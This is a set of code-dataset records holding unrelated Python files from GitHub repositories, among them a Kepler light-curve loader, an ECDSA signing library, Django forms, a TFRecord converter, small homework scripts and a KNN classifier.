'SELECT cadenceno, quarter, sap_quality, time, {} ' \\\n 'FROM {} WHERE keplerid = %s AND {};'\\\n .format(flux_str, table_name, lc_flag)\n\n cursor.execute(to_ex, (int(kic),))\n results = cursor.fetchall()\n cadences = np.array([x[0] for x in results], dtype=np.int32)\n quarters = np.array([x[1] for x in results], dtype=np.int32)\n flags = np.array([x[2] for x in results], dtype=np.int32)\n times = np.array([x[3] for x in results], dtype=np.float64)\n fluxes = np.array([x[4] for x in results], dtype=np.float32)\n flux_errs = np.array([x[5] for x in results], dtype=np.float32)\n cursor.close()\n db.close()\n\n # For some reason some results are coming back with\n # arrays of length 0.\n if len(times) > 0:\n got_it = True\n\n count += 1\n except pymysql.OperationalError:\n print('mysqldb connection failed on attempt {0} of {1}.\\n'\n 'Trying again.'.format(count + 1, 5))\n count += 1\n else:\n # Run query through an SSH tunnel\n query_str = \"'SELECT cadenceno, quarter, sap_quality, time, {0} \" \\\n \"FROM {3} \" \\\n \"WHERE keplerid = {2} AND {1};'\".format(flux_str, lc_flag, int(kic), table_name)\n\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n ssh.connect(db_params['tunnel_host'], username=db_params['tunnel_user'])\n\n command_str = 'mysql -h {} -u {} -D {} --password={} -e {}'\\\n .format(db_params['host'], db_params['user'], db_name,\n db_params['password'], query_str)\n\n stdin, stdout, stderr = ssh.exec_command(command_str)\n results = stdout.read().splitlines()\n results = results[1:]\n\n cadences = np.array([int(x.split('\\t')[0]) for x in results],\n dtype=np.int32)\n quarters = np.array([int(x.split('\\t')[1]) for x in results],\n dtype=np.int32)\n flags = np.array([int(x.split('\\t')[2]) for x in results],\n dtype=np.int32)\n times = np.array([float(x.split('\\t')[3]) for x in results],\n dtype=np.float64)\n fluxes = np.array([float(x.split('\\t')[4]) for x in results],\n dtype=np.float32)\n flux_errs = np.array([float(x.split('\\t')[5]) for x in results],\n dtype=np.float32)\n ssh.close()\n\n else:\n client = kplr.API()\n\n light_curves = client.light_curves(kepler_id=kic, fetch=fetch,\n short_cadence=(not long_cadence))\n\n times, fluxes, flux_errs = [], [], []\n flags, cadences, quarters = [], [], []\n\n for lc in light_curves:\n with lc.open() as ff:\n hdu_data = ff[1].data\n\n times = np.append(times, hdu_data[\"time\"])\n flags = np.append(flags, hdu_data[\"sap_quality\"])\n cadences = np.append(cadences, hdu_data[\"cadenceno\"])\n\n quarter = np.repeat(int(ff[0].header['quarter']),\n len(hdu_data))\n quarters = np.append(quarters, quarter)\n\n if use_pdc:\n fluxes = np.append(fluxes, hdu_data[\"pdcsap_flux\"])\n flux_errs = np.append(flux_errs,\n hdu_data[\"pdcsap_flux_err\"])\n else:\n fluxes = np.append(fluxes, hdu_data[\"sap_flux\"])\n flux_errs = np.append(flux_errs, hdu_data[\"sap_flux_err\"])\n\n # Remove NaNs\n good_data = np.isfinite(fluxes)\n times = times[good_data]\n fluxes = fluxes[good_data]\n flux_errs = flux_errs[good_data]\n flags = flags[good_data]\n cadences = cadences[good_data]\n quarters = quarters[good_data]\n\n if len(times) == 0:\n raise exceptions.NoLightCurvesError('No light curves found for KIC {}'.format(kic))\n\n # Guarantee the light curve is in sequential order\n # %timeit says that doing the ordering in Python is faster than\n # including an 'ORDER BY time' flag in the MySQL search.\n # I have no idea why, but I'll keep doing the ordering here.\n order = np.argsort(times)\n times = times[order]\n fluxes = fluxes[order]\n flux_errs = flux_errs[order]\n flags = flags[order]\n cadences = cadences[order]\n quarters = quarters[order]\n\n return times, fluxes, flux_errs, cadences, quarters, flags.astype(int)\n","repo_name":"jadilia/decatur","sub_path":"decatur/kepler_data.py","file_name":"kepler_data.py","file_ext":"py","file_size_in_byte":9218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14972393325","text":"#If the bill was $150.00, split between 5 people, with 12% tip. \n\n#Each person should pay (150.00 / 5) * 1.12 = 33.6\n#Format the result to 2 decimal places = 33.60\n\n#Tip: There are 2 ways to round a number. You might have to do some Googling to solve this.💪\n\n#Write your code below this line 👇\n\n#Welcome the user\nprint(\"Welcome to the tip calculator!\\n\")\n\n#Gather the input\ntotal_bill=input(\"What was your total bill? $\")\n\n#typecast to float\nnew_total_bill=float(total_bill)\n\n#find the amount of tip to be given\ntip=int(input(\"What percentage tip would you like to give? 10, 12 or 15? \"))\n\n#find the number of people to split the bill\npeople=int(input(\"How many people want to split the bill? \"))\n\n\n#find the percentage tip and the amount to be split\nvalue_of_tip=(tip/100) + 1\nnew_total=new_total_bill* value_of_tip\nresult=new_total/people\nround_result = \"{:.2f}\".format(result)\nprint(f\"Each person should pay: ${round_result}\")","repo_name":"james-taban/TIP-CALCULATOR","sub_path":"TipCalculator (1).py","file_name":"TipCalculator (1).py","file_ext":"py","file_size_in_byte":935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14365779537","text":"\r\ndef distForm():\r\n #stores values of point\r\n x1 = float(input(\"Enter the x: \"))\r\n y1 = float(input(\"Enter the y: \"))\r\n z1 = float(input(\"Enter the z: \"))\r\n #value of centroid, change as needed\r\n cx = 1.966\r\n cy = 9.866\r\n cz = 17.366\r\n #parts of distance formula\r\n dp1 = pow((cx - x1), 2)\r\n dp2 = pow((cy - y1), 2)\r\n dp3 = pow((cz - z1), 2)\r\n #returns distance formula results\r\n return dp1+dp2+dp3\r\ndef calAvg():\r\n num = int(input(\" how many points are there\"))\r\n Sum = 0\r\n for x in range(num):\r\n Sum += float(input(\"enter distance: \")) \r\n return Sum/num\r\n\r\n#print(calAvg())\r\n#for x in range(6):\r\nprint(distForm())\r\n \r\n","repo_name":"TechPointYT/randoStuff","sub_path":"homework 2 script.py","file_name":"homework 2 script.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2018782","text":"from .coding import SDNML\n\n\nclass Finder(object):\n def __init__(self, discounting_param=0.1, order=2, smoothing=10,\n code_length_class='sdnml'):\n self.discounting_param = discounting_param\n self.order = order\n self.smoothing = smoothing\n if code_length_class == 'sdnml':\n self.first_code_length = SDNML(\n discounting_param=discounting_param,\n order=order)\n self.second_code_length = SDNML(\n discounting_param=discounting_param,\n order=order)\n else:\n raise ValueError(\"Unknown code-length class {:s}\".format(\n code_length_class))\n self._first_score_queue = [0 for _ in range(smoothing)]\n self._second_score_queue = [0 for _ in range(smoothing)]\n\n def score_one(self, x):\n \"\"\"Calculate a change score.\n\n Parameters\n ----------\n x : float\n The sample you want to calculate the change score.\n\n Returns\n -------\n score : float\n Change score of the sample.\n \"\"\"\n self._first_score_queue.pop(0)\n self._first_score_queue.append(self.first_code_length.length(x))\n first_smoothed = sum(self._first_score_queue)/self.smoothing\n self._second_score_queue.pop(0)\n self._second_score_queue.append(\n self.second_code_length.length(first_smoothed))\n score = sum(self._second_score_queue)/self.smoothing\n return score\n\n def score(self, X):\n \"\"\"Calculate change scores.\n\n Parameters\n ----------\n X : array-like, shape (1, n_samples)\n Sequence of the samples.\n\n Returns\n -------\n scores : iterator shale(n_samples)\n Change scores of the individuale samples.\n \"\"\"\n for x in X:\n yield self.score_one(x)\n","repo_name":"hana-day/rtchange","sub_path":"rtchange/finder.py","file_name":"finder.py","file_ext":"py","file_size_in_byte":1897,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"20612271541","text":"import six\nimport tensorflow as tf\nfrom nvidia_tao_tf1.cv.common.dataio.data_converter import DataConverter, TfRecordType\n\n\nclass CustomDataConverter(DataConverter):\n \"\"\"Converts a dataset to TFRecords.\"\"\"\n\n feature_to_type = {\n 'train/image_frame_name' : TfRecordType.BYTES,\n 'train/image_frame_width' : TfRecordType.INT64,\n 'train/image_frame_height' : TfRecordType.INT64,\n 'train/facebbx_x' : TfRecordType.INT64,\n 'train/facebbx_y' : TfRecordType.INT64,\n 'train/facebbx_w' : TfRecordType.INT64,\n 'train/facebbx_h' : TfRecordType.INT64,\n 'train/lefteyebbx_x' : TfRecordType.INT64,\n 'train/lefteyebbx_y' : TfRecordType.INT64,\n 'train/lefteyebbx_w' : TfRecordType.INT64,\n 'train/lefteyebbx_h' : TfRecordType.INT64,\n 'train/righteyebbx_x' : TfRecordType.INT64,\n 'train/righteyebbx_y' : TfRecordType.INT64,\n 'train/righteyebbx_w' : TfRecordType.INT64,\n 'train/righteyebbx_h' : TfRecordType.INT64,\n 'train/landmarks' : TfRecordType.DTYPE_FLOAT,\n 'train/landmarks_occ' : TfRecordType.DTYPE_INT64,\n 'label/left_eye_status' : TfRecordType.BYTES,\n 'label/right_eye_status' : TfRecordType.BYTES,\n 'train/num_keypoints' : TfRecordType.INT64,\n 'train/tight_facebbx_x1' : TfRecordType.INT64,\n 'train/tight_facebbx_y1' : TfRecordType.INT64,\n 'train/tight_facebbx_x2' : TfRecordType.INT64,\n 'train/tight_facebbx_y2' : TfRecordType.INT64,\n 'label/hp_pitch': TfRecordType.FLOAT, # Degrees\n 'label/hp_yaw': TfRecordType.FLOAT, # Degrees\n 'label/hp_roll': TfRecordType.FLOAT, # Degrees\n 'label/theta': TfRecordType.FLOAT, # Radians\n 'label/phi': TfRecordType.FLOAT, # Radians\n 'label/mid_cam_x': TfRecordType.FLOAT, # Mid eye center - x\n 'label/mid_cam_y': TfRecordType.FLOAT, # Mid eye center - y\n 'label/mid_cam_z': TfRecordType.FLOAT, # Mid eye center - z\n 'label/lpc_cam_x': TfRecordType.FLOAT, # Left eye center - x\n 'label/lpc_cam_y': TfRecordType.FLOAT, # Left eye center - y\n 'label/lpc_cam_z': TfRecordType.FLOAT, # Left eye center - z\n 'label/rpc_cam_x': TfRecordType.FLOAT, # Right eye center - x\n 'label/rpc_cam_y': TfRecordType.FLOAT, # Right eye center - y\n 'label/rpc_cam_z': TfRecordType.FLOAT, # Right eye center - z\n 'train/valid_theta_phi' : TfRecordType.INT64, # 1 if valid, 0 otherwise\n 'label/theta_le' : TfRecordType.FLOAT, # In radians\n 'label/phi_le' : TfRecordType.FLOAT, # In radians\n 'label/theta_re' : TfRecordType.FLOAT, # In radians\n 'label/phi_re' : TfRecordType.FLOAT, # In radians\n 'label/theta_mid' : TfRecordType.FLOAT, # In radians\n 'label/phi_mid' : TfRecordType.FLOAT, # In radians\n 'label/head_pose_theta' : TfRecordType.FLOAT, # In radians\n 'label/head_pose_phi' : TfRecordType.FLOAT, # In radians\n 'train/eye_features' : TfRecordType.DTYPE_FLOAT,\n 'train/source' : TfRecordType.BYTES,\n 'train/num_eyes_detected': TfRecordType.INT64,\n 'train/norm_frame_path': TfRecordType.BYTES,\n 'label/norm_face_gaze_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_face_gaze_phi': TfRecordType.FLOAT, # In radians\n 'label/norm_face_hp_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_face_hp_phi': TfRecordType.FLOAT, # In radians\n 'label/norm_leye_gaze_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_leye_gaze_phi': TfRecordType.FLOAT, # In radians\n 'label/norm_leye_hp_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_leye_hp_phi': TfRecordType.FLOAT, # In radians\n 'label/norm_reye_gaze_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_reye_gaze_phi': TfRecordType.FLOAT, # In radians\n 'label/norm_reye_hp_theta': TfRecordType.FLOAT, # In radians\n 'label/norm_reye_hp_phi': TfRecordType.FLOAT, # In radians\n 'train/norm_facebb_x': TfRecordType.INT64,\n 'train/norm_facebb_y': TfRecordType.INT64,\n 'train/norm_facebb_w': TfRecordType.INT64,\n 'train/norm_facebb_h': TfRecordType.INT64,\n 'train/norm_leyebb_x': TfRecordType.INT64,\n 'train/norm_leyebb_y': TfRecordType.INT64,\n 'train/norm_leyebb_w': TfRecordType.INT64,\n 'train/norm_leyebb_h': TfRecordType.INT64,\n 'train/norm_reyebb_x': TfRecordType.INT64,\n 'train/norm_reyebb_y': TfRecordType.INT64,\n 'train/norm_reyebb_w': TfRecordType.INT64,\n 'train/norm_reyebb_h': TfRecordType.INT64,\n 'train/norm_landmarks': TfRecordType.DTYPE_FLOAT,\n 'train/norm_per_oof': TfRecordType.FLOAT,\n 'train/landmarks_3D': TfRecordType.DTYPE_FLOAT\n }\n\n lm_pred_feature_to_type = {k : v for k, v in six.iteritems(feature_to_type)\n if 'lefteyebbx' not in k and\n 'righteyebbx' not in k and\n 'facebbx' not in k and\n 'num_eyes_detected' not in k}\n\n # Convert from enum type to read tfrecord type\n enum_to_read_dict = {\n TfRecordType.BYTES : tf.FixedLenFeature([], dtype=tf.string),\n TfRecordType.FLOAT : tf.FixedLenFeature([], dtype=tf.float32),\n TfRecordType.INT64 : tf.FixedLenFeature([], dtype=tf.int64),\n TfRecordType.DTYPE_FLOAT : tf.VarLenFeature(tf.float32),\n TfRecordType.DTYPE_INT64 : tf.VarLenFeature(tf.int64)\n }\n\n def __init__(self, use_lm_pred):\n \"\"\"Initialize file paths and features.\n\n Args:\n tfrecord_files_path (path): Path to dump tfrecord files.\n use_lm_pred (bool): True if using predicted landmarks.\n \"\"\"\n\n self._feature_to_type_dict = self.feature_to_type\n if use_lm_pred:\n self._feature_to_type_dict = self.lm_pred_feature_to_type\n\n def generate_frame_tfrecords(self, frame_dict):\n \"\"\"Write collected data dict into tfrecords.\n\n Args:\n frame_dict (dict): dictionary for frame information\n \"\"\"\n\n example_array = []\n for frame in frame_dict.keys():\n frame_features = {}\n frame_data_dict = frame_dict[frame]\n\n for feature in self._feature_to_type_dict.keys():\n self.write_feature(feature, frame_data_dict[feature], frame_features)\n example = tf.train.Example(features=tf.train.Features(feature=frame_features))\n example_array.append(example)\n\n return example_array\n","repo_name":"NVIDIA/tao_tensorflow1_backend","sub_path":"nvidia_tao_tf1/cv/common/dataio/custom_data_converter.py","file_name":"custom_data_converter.py","file_ext":"py","file_size_in_byte":6798,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"19024560908","text":"# how many no. are there whose reverse is present in the list\n# (1, 2, 3, 8, 9, 3, 2, 1) → 3\n# (1, 2, 1, 4) → 3\n# (7, 1, 2, 9, 7, 2, 1) → 2\nimport os\nos.system(\"cls\")\nx=[1, 2, 3, 8, 9, 3, 2, 1]\nreverse=len(x)\nfor i in range(0,len(x)-1):\n new_x=[]\n for j in range(0,reverse):\n new_x.append(x[j])\n new_x.reverse()\n c=0\n for j in range(0,len(x)-len(new_x)+1): \n for k in range(0,len(new_x)):\n if new_x[k]!=x[k]:\n c+=1\n break \n if c bool:\n if isinstance(message, str):\n message = bytes(message, 'utf-8')\n\n if isinstance(signature, str):\n signature = bytes.fromhex(signature)\n\n if self._mode == EcdsaModes.SECP256K1_KECCAK_256_ETHEREUM:\n message_hash = defunct_hash_message(message)\n try:\n signature_bytes_standard = to_standard_signature_bytes(\n signature)\n signature_obj = EthereumKeys.Signature(\n signature_bytes=signature_bytes_standard)\n obtained_public_value = signature_obj.recover_public_key_from_msg_hash(\n message_hash).to_bytes()\n if obtained_public_value != self._public_bytes:\n raise eth_keys_exceptions.BadSignature\n except (ValueError, eth_keys_exceptions.BadSignature):\n raise InvalidSignatureError\n\n else:\n hash_function = '_'.join(self._mode.split('_')[1:]).lower()\n message_hash = hash_message(message, hash_function)\n try:\n self._public_key_object.verify(\n signature, message_hash,\n ec.ECDSA(getattr(hashes, hash_function.upper())()))\n except cryptography_exceptions.InvalidSignature:\n raise InvalidSignatureError\n\n def _load_public_value(self, key):\n if self._key_format == EcdsaFormats.RAW_VALUE:\n if isinstance(key, str):\n key = bytes.fromhex(key)\n self._public_bytes = key\n else:\n raise ValueError\n self._load_public_key()\n\n def _load_public_key(self):\n if self._mode != EcdsaModes.SECP256K1_KECCAK_256_ETHEREUM:\n self._public_key_object = ec.EllipticCurvePublicKey.from_encoded_point(\n self._eliptic_curve,\n b'\\x04' + self._public_bytes,\n )\n\n self._public_value = {\n 'x': big_endian_to_int(self._public_bytes[:32]),\n 'y': big_endian_to_int(self._public_bytes[32:]),\n }\n\n\nclass EcdsaPrivateKey(PrivateKeyInterface):\n def __init__(\n self,\n filepath: str = None,\n password: str = None,\n mode: str = None,\n key_format: str = None,\n key=None,\n ):\n self._private_value = None\n self._private_key_object = None\n self._public_key_object = None\n\n if mode not in EcdsaModes.options():\n raise ValueError\n self._mode = mode\n self._eliptic_curve = getattr(ec, self._mode.split('_')[0])()\n\n if key is None and filepath is None:\n self._generate_private_value()\n return\n\n if key_format is None:\n key_format = EcdsaFormats.RAW_VALUE\n if key_format not in EcdsaFormats.options():\n raise ValueError\n self._key_format = key_format\n\n if key is not None:\n self._load_private_value(key, password)\n\n elif filepath is not None:\n self._load_private_key_from_file(filepath, password)\n\n @property\n def public_key(self):\n return self._public_key_object\n\n @property\n def private_value(self):\n return self._private_value\n\n @property\n def private_bytes(self):\n return int_to_big_endian(self.private_value)\n\n @property\n def private_value_base64(self):\n return base64.b64encode(self.private_bytes).decode('ascii')\n\n @property\n def private_value_hex(self):\n return self.private_bytes.hex()\n\n def get_ethereum_account(self, password: str = None):\n password = password if password is not None else ''\n return EthereumAccount.encrypt(self._private_value, password)\n\n def sign(self, message) -> bytes:\n if isinstance(message, str):\n message = bytes(message, 'utf-8')\n\n if not isinstance(message, bytes):\n raise ValueError\n\n if self._mode == EcdsaModes.SECP256K1_KECCAK_256_ETHEREUM:\n message_hash = defunct_hash_message(message)\n (_, _, _, signature) = sign_message_hash(self._private_key_object,\n message_hash)\n\n else:\n hash_function = '_'.join(self._mode.split('_')[1:]).lower()\n message_hash = hash_message(message, hash_function)\n signature = self._private_key_object.sign(\n message_hash,\n ec.ECDSA(getattr(hashes, hash_function.upper())()),\n )\n return signature\n\n def _generate_private_value(self):\n self._private_value = ec.generate_private_key(\n self._eliptic_curve).private_numbers().private_value\n self._load_private_key()\n\n def _load_private_value(self, key, password: str = None):\n if self._key_format == EcdsaFormats.ETHEREUM_JSON:\n if not isinstance(key, dict):\n key = json.loads(key)\n private_value = bytes(EthereumAccount.decrypt(key, password))\n self._private_value = big_endian_to_int(private_value)\n elif self._key_format == EcdsaFormats.RAW_VALUE:\n if isinstance(key, bytes):\n key = big_endian_to_int(key)\n if not isinstance(key, int):\n raise ValueError(f'{type(key)} is not int')\n self._private_value = key\n else:\n raise ValueError\n self._load_private_key()\n\n def _load_private_key(self):\n if self._mode == EcdsaModes.SECP256K1_KECCAK_256_ETHEREUM:\n self._private_key_object = EthereumKeys.PrivateKey(\n int_to_big_endian(self._private_value))\n public_bytes = self._private_key_object.public_key.to_bytes()\n self._public_key_object = EcdsaPublicKey(\n key=public_bytes,\n mode=self._mode,\n key_format=EcdsaFormats.RAW_VALUE,\n )\n else:\n self._private_key_object = ec.derive_private_key(\n self._private_value, self._eliptic_curve)\n public_numbers = self._private_key_object.public_key(\n ).public_numbers()\n public_bytes = int_to_big_endian(public_numbers.x) \\\n + int_to_big_endian(public_numbers.y)\n self._public_key_object = EcdsaPublicKey(\n key=public_bytes,\n mode=self._mode,\n key_format=EcdsaFormats.RAW_VALUE,\n )\n\n def _load_private_key_from_file(self, filepath: str, password: str):\n with open(filepath, 'rb') as input_file:\n data = input_file.read()\n self._load_private_value(data, password)\n","repo_name":"labteral/digsig","sub_path":"digsig/ecdsa.py","file_name":"ecdsa.py","file_ext":"py","file_size_in_byte":8823,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25816757155","text":"from django.contrib.auth.forms import UserCreationForm\nfrom django import forms\nfrom django.contrib.auth.models import User\nfrom .models import Profile\n\n#extiende el formulario UserCreationForm para que contenga el campo Email\n#Asimismo, valida el contenido del Email ingresado\nclass UserCreationformWithEmail(UserCreationForm):\n email = forms.EmailField (required=True, help_text= \"Ingrese su Email. 254 caracteres como máximo y deben ser valido\")\n\n class Meta:\n model = User\n fields = ('username','password1','password2','email')\n \n #permite validar la existencia de Emails duplicados\n def clean_email(self):\n email = self.cleaned_data.get(\"email\")#recupera el campo que vamos a validar\n if User.objects.filter(email=email).exists():#compara la existencia de Emails duplicados\n raise forms.ValidationError(\"Ya existen usuarios registrados con este Email, ingrese otro\")\n return email\n\n#formulario para ingreso de datos al perfil\nclass ProfileForm (forms.ModelForm):\n class Meta:\n model = Profile\n fields = ['avatar', 'bio', 'link']\n widgets = {\n 'avatar':forms.ClearableFileInput(attrs={'class':'form-control-file mt-3'}),\n 'bio':forms.Textarea(attrs={'class':'form-control mt-3', 'rows':3, 'placeholder':'Biografía'}),\n 'link':forms.URLInput(attrs={'class':'form-control mt-3', 'placeholder':'Enlace'}),\n }\n#permite editar el email\nclass EmailForm(forms.ModelForm):\n email = forms.EmailField (required=True, help_text= \"Ingrese su Email. 254 caracteres como máximo y deben ser valido\")\n \n class Meta:\n model = User\n fields = ['email']\n\n def clean_email(self):\n email = self.cleaned_data.get(\"email\")#recupera el campo que vamos a validar\n if 'email' in self.changed_data:#compruba si ya hay un mail guardado y si se modificó\n if User.objects.filter(email=email).exists():#compara la existencia de Emails duplicados\n raise forms.ValidationError(\"Ya existen usuarios registrados con este Email, ingrese otro\")\n return email\n","repo_name":"ramacualquiercosa/PIG_G3_22816","sub_path":"PIG_G3_22816/registration/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2127,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43190896828","text":"#coding: utf-8\n\n# 正则表达式可以作为 BeautifulSoup 语句的任意一个参数\n# 让你的目标元素查找工作极具灵活性\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom bs4 import BeautifulSoup\nimport re\n\ntry:\n html = urlopen('http://www.pythonscraping.com/pages/page3.html')\nexcept HTTPError as e:\n print('url is not found!')\nelse:\n if html is None:\n print('url is None!')\n else:\n bsObj = BeautifulSoup(html)\n\n # 注意观察网页上有几个商品图片——它们的源代码形式如下:\n # \n images = bsObj.findAll(\"img\", {\"src\": re.compile(\"\\.\\.\\/img\\/gifts/img.*\\.jpg\")})\n for image in images:\n print(image[\"src\"])","repo_name":"Vencenter/Python_example","sub_path":"python开发案例/python网络数据采集/复杂html解析/正则表达式/re_test.py","file_name":"re_test.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"16952133796","text":"import random\nimport time\n\ntime.time()\n\nwaitingRoom=[]\n\ntriageRoom=[]\n\npatients=[\"bobby\",\"tom\",\"harold\",\"jenny\",\"bruce\",\\\n \"stephane\",\"george\",\"thomas\",\"bowie\",\"grant\",\\\n \"kimber\",\"lucas\",\"jonah\",\"joey\",\"monica\"]\n\nexamRoom=[]\n\ndef callNurse():\n triageRoom.append(waitingRoom.pop(0))\n\n\nclass patient:\n \n def __init__(self):\n self.name=random.choice(patients)+\" \"+random.choice(patients)\n self.pos=\"waiting room\"\n self.visitTime = int(random.randrange(15,20))\n \n\n def __str__(self):\n return self.name\n\ndef simulate():\n\n minute=1 \n\n for i in range(20):\n p = patient()\n waitingRoom.append(p)\n \n while True:\n \n if len(waitingRoom) > 0:\n callNurse()\n \n if len(triageRoom)>0:\n if len(examRoom)<6:\n try:\n examRoom.append(triageRoom.pop(0))\n except IndexError:\n break\n \n else:\n print(\"examRoom is filled or empty\")\n\n for pat in examRoom:\n pat.visitTime -=1\n print(pat.name,pat.visitTime)\n if pat.visitTime ==0:\n examRoom.remove(pat)\n print(\"minute\"+\" \"+str(minute))\n print(\" \")\n\n minute=minute+1\n\n if len(waitingRoom)==0 and len(triageRoom)==0 and len(examRoom)==0:\n break\n \n\n \nsimulate()\n","repo_name":"Alexmallick/data-structures-HW","sub_path":"lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":1451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13917216661","text":"_base_ = ['./text-detection_static.py', '../../_base_/backends/tensorrt.py']\nonnx_config = dict(\n output_names=['dets', 'labels', 'masks'],\n dynamic_axes=dict(\n input=dict({\n 0: 'batch',\n 2: 'height',\n 3: 'width'\n }),\n dets=dict({\n 0: 'batch',\n 1: 'num_dets'\n }),\n labels=dict({\n 0: 'batch',\n 1: 'num_dets'\n }),\n masks=dict({\n 0: 'batch',\n 1: 'num_dets',\n 2: 'height',\n 3: 'width'\n })))\n\nbackend_config = dict(\n common_config=dict(max_workspace_size=1 << 30),\n model_inputs=[\n dict(\n input_shapes=dict(\n input=dict(\n min_shape=[1, 3, 320, 320],\n opt_shape=[1, 3, 600, 800],\n max_shape=[1, 3, 2240, 2240])))\n ])\n\ncodebase_config = dict(\n post_processing=dict(\n score_threshold=0.05,\n confidence_threshold=0.005,\n iou_threshold=0.5,\n max_output_boxes_per_class=200,\n pre_top_k=5000,\n keep_top_k=100,\n background_label_id=-1,\n export_postprocess_mask=False))\n","repo_name":"open-mmlab/mmdeploy","sub_path":"configs/mmocr/text-detection/text-detection_mrcnn_tensorrt_dynamic-320x320-2240x2240.py","file_name":"text-detection_mrcnn_tensorrt_dynamic-320x320-2240x2240.py","file_ext":"py","file_size_in_byte":1197,"program_lang":"python","lang":"en","doc_type":"code","stars":2256,"dataset":"github-code","pt":"53"} +{"seq_id":"14817016243","text":"import cv2\nimport numpy as np\n\ndef AlphaBlend(img1, img2, alpha):\n\n blendS = img1 * alpha + img2 * (1. - alpha)\n\n return blendS\n\nimg1 = cv2.imread(\"../imori.jpg\").astype(np.float)\nimg2 = cv2.imread(\"../thorino.jpg\").astype(np.float)\n\nblendS = AlphaBlend(img1, img2, 0.6)\nblendS = blendS.astype(np.uint8)\n\ncv2.imwrite(\"myans_60.jpg\", blendS)\ncv2.imshow(\"result\", blendS)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","repo_name":"OverHall27/Gasyori100knock","sub_path":"Question_51_60/myanswers/myans_60.py","file_name":"myans_60.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28519461981","text":"import joblib\nimport numpy as np\n\n\nclass KNeighborsClassifier:\n def __init__(self, n_neighbors: int = 1):\n self.n_neighbors = n_neighbors\n\n self.classes = {}\n self.__uuid_classes: np.ndarray = None\n\n self._last_class_id = 0\n self._X: np.ndarray = None\n self._y: np.ndarray = None\n\n self.fitted = False\n\n @classmethod\n def from_file(cls, file_path):\n return joblib.load(file_path)\n\n def partial_fit(self, X, y):\n _y = np.empty(y.shape, dtype=np.int)\n _y_counts = np.empty(y.shape, dtype=np.int)\n for i, cls in enumerate(y):\n class_info = self.classes.setdefault(cls, np.array([self._last_class_id, 0], dtype='int64'))\n class_info[1] += 1\n class_id, class_count = class_info\n _y[i] = class_id\n _y_counts[i] = class_count\n if class_id == self._last_class_id:\n if self.__uuid_classes is None:\n self.__uuid_classes = np.array([cls], dtype='S36')\n else:\n self.__uuid_classes = self._extend(self.__uuid_classes, [cls])\n self._last_class_id += 1\n if self._y is None:\n self._y = np.array(_y)\n else:\n self._y = self._extend(self._y, _y)\n if self._X is None:\n self._X = np.array(X)\n else:\n self._X = self._extend(self._X, X)\n self.fitted = True\n\n return _y_counts\n\n def __calc_distances(self, X):\n distances = np.empty(self._y.shape, dtype=np.float)\n\n for i in range(self._y.shape[0]):\n distances[i] = self.distance(self._X[i], X)\n\n return distances\n\n def predict(self, X):\n if not self.fitted:\n return np.array([]), np.array([])\n\n return self._predict(X)\n\n def predict_on_batch(self, X):\n if not self.fitted:\n return np.array([]), np.array([])\n\n distances = np.empty(X.shape[0], dtype=np.float32)\n uuidx = np.empty(X.shape[0], dtype='S36')\n\n for i, x in enumerate(X):\n distances[i], uuidx[i] = self._predict(x)\n\n return distances, uuidx\n\n def _predict(self, X):\n distances = self.__calc_distances(X)\n\n if self.n_neighbors == 1:\n min_idx = np.argmin(distances)\n predicted_class_id = self._y[min_idx]\n distance = distances[min_idx]\n else:\n min_idx = np.argpartition(distances, self.n_neighbors)[:self.n_neighbors]\n y_min = self._y[min_idx]\n cls, counts = np.unique(y_min, return_counts=True)\n argmax = np.argmax(counts)\n predicted_class_id = cls[argmax]\n distance = distances[predicted_class_id]\n\n return distance, self.__uuid_classes[predicted_class_id]\n\n def kneighbors(self, X, n_neighbors=None):\n distances = self.__calc_distances(X)\n if n_neighbors:\n min_idx = np.argpartition(distances, n_neighbors)[:n_neighbors]\n neighbors = sorted(zip(distances[min_idx], min_idx), key=lambda x: x[0])\n neighbors_distances = np.fromiter((n[0] for n in neighbors), dtype=np.float64)\n neighbors_classes = self._y[[n[1] for n in neighbors]]\n neighbors_uuid = self.__uuid_classes[neighbors_classes]\n else:\n idx = np.argsort(distances)\n neighbors_distances = distances[idx]\n neighbors_classes = self._y[idx]\n neighbors_uuid = self.__uuid_classes[neighbors_classes]\n\n return neighbors_distances, neighbors_uuid\n\n def save(self, file_name='knn_classifier.pkl'):\n joblib.dump(self, file_name)\n\n def uuid_in_classes(self, uuid):\n return uuid in self.__uuid_classes\n\n @staticmethod\n def _extend(arr, values):\n shape = arr.shape\n new_shape = shape[0] + len(values), *shape[1:]\n x = np.resize(arr, new_shape)\n for i in range(shape[0], new_shape[0]):\n if len(shape) == 2:\n x[i, :] = values[shape[0] - i]\n else:\n x[i] = values[shape[0] - i]\n return x\n\n @staticmethod\n def distance(a, b):\n return np.sqrt(np.sum((a - b) ** 